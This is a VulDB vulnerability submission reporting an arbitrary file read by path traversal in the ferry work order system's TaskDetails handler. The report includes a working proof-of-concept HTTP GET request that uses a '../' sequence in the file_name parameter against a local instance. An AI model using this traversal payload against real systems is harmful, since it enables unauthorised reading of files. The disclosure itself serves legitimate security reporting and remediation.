제출 #50729: ferry work order system background arbitrary file reading정보

제목	ferry work order system background arbitrary file reading
설명	Hello, I sent an authorized arbitrary file to read in the ferry system File address: https://github.com/lanyulei/ferry/blob/master/apis/process/task.go Accept file_name from GET request in TaskDetails function Judgment as follows -------------------------------------------------------------------------------------------------------- fileName == "" \|\| strings.HasPrefix(fileName, ".") \|\| strings.HasPrefix(fileName, "/") \|\| strings.HasPrefix(fileName, "\\") //it only verifies the beginning ----------------------------------------------------------------------------------------------------------- Judgment, this cannot avoid the occurrence of loopholes We can copy file_name as ls.txt/../../anyfile At this time, the system will return the file content to cause arbitrary file read vulnerability Here is what I reproduced locally I use golang1.16.15 to build in windows environment ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- GET /api/v1/details?file_name=1.txt/../../../../../../../../../../../../test.txt HTTP/1.1 Host: 127.0.0.1:8002 sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: http://127.0.0.1:8002/ Accept-Encoding: gzip, deflate Cookie: Hm_lvt_1d2d61263f13e4b288c8da19ad3ff56d=1667456630; Hm_lpvt_1d2d61263f13e4b288c8da19ad3ff56d=1667456630 Connection: close ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- My test.txt file is in the root directory of the E drive, at this point I can read it project address：https://github.com/lanyulei/ferry Thanks for your review
사용자	qsec (UID 33968)
제출	2022. 11. 03. AM 09:33 (4 연령 ago)
모더레이션	2022. 11. 11. AM 07:56 (8 days later)
상태	수락
VulDB 항목	213447 [lanyulei ferry apis/process/task.go file_name 디렉토리 순회]
포인트들	17

◂ 이전 개요 다음 ▸

Interested in the pricing of exploits?

See the underground prices here!